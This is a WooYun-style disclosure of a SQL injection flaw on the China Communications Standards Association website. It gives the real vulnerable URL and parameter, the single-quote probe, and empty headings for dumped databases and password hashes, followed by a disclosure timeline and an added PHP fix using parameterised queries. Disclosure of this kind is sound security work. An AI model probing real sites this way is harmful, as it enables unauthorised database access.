
Vulnerability summary

Defect ID: wooyun-2015-0126862

Title: SQL injection on the main site of the China Communications Standards Association (中国通信标准化协会)

Affected vendor: China Communications Standards Association (中国通信标准化协会)

Author: MT哥

Submitted: 2015-07-15 12:52

Fixed: 2015-08-31 16:04

Published: 2015-08-31 16:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: handed over to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-15: Details sent to the vendor; awaiting the vendor's handling
2015-07-17: Vendor confirmed; details disclosed to the vendor only
2015-07-27: Details disclosed to core white hats and experts in the relevant field
2015-08-06: Details disclosed to regular white hats
2015-08-16: Details disclosed to intern white hats
2015-08-31: Details disclosed to the public

Brief description:

Inject, inject, inject until it all pours out

Detailed description:

http://www.ccsa.org.cn/showgn.php3?source=yd&id=4550


Just tack on a single quote and it throws an error~~ ~.~

Proof of vulnerability:

available databases [44]:


database management system users password hashes:


Remediation:

WAF + filtering
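The report shows that a stray quote in the `id` parameter of showgn.php3 reached the database as SQL, and that the resulting access was broad enough to enumerate every database and the DBMS account hashes. As an added illustration of a more durable fix than a WAF alone (this is example code, not the site's or the author's), the following PHP handler validates `source` against an allow-list, validates `id` as an integer, binds both as parameters, and connects with a read-only account; the table, column, database and account names are hypothetical:

```php
<?php
// Added example, not the original site's code. Table/column/DB names are hypothetical.
// Symptom in the report: appending a quote to `id` produced a database error, i.e.
// raw request input was being concatenated into the SQL text.
// Fix: validate, then bind as parameters so input is never parsed as SQL.
declare(strict_types=1);

// Hypothetical allow-list of the `source` values the application actually serves.
const ALLOWED_SOURCES = ['yd' => true];

function fetchArticle(mysqli $db, string $source, string $id): ?array
{
    // 1. Allow-list `source` instead of trying to filter out "bad" characters.
    if (!isset(ALLOWED_SOURCES[$source])) {
        return null;
    }
    // 2. `id` must be a positive integer; a value such as "4550'" fails validation outright.
    $idInt = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($idInt === false) {
        return null;
    }
    // 3. Parameterised query: placeholders, never string concatenation.
    $stmt = $db->prepare(
        'SELECT id, title, body FROM articles WHERE source = ? AND id = ? LIMIT 1'
    );
    $stmt->bind_param('si', $source, $idInt);   // s = string, i = integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage. Hypothetical read-only DB account scoped to this one database, so that a
// future query bug cannot reach other schemas or the mysql.user table as in the report.
$db = new mysqli('localhost', 'web_ro', 'CHANGE_ME_PLACEHOLDER', 'webdb');
$db->set_charset('utf8mb4');
$article = fetchArticle($db, $_GET['source'] ?? '', $_GET['id'] ?? '');
if ($article === null) {
    http_response_code(404);   // generic response; no SQL error text reaches the client
    exit;
}
```

Turning off `display_errors` in production keeps the database's own error messages, which is what revealed the injection here, out of the HTTP response.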

Copyright notice: please credit the source when reposting: MT哥@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-07-17 16:04

Vendor reply:

CNVD has confirmed and reproduced the described issue. CNVD has notified the website's administrator by email through its publicly listed contact channel; the administrator will provide a fix and coordinate handling with the affected user units.

Latest status:

None yet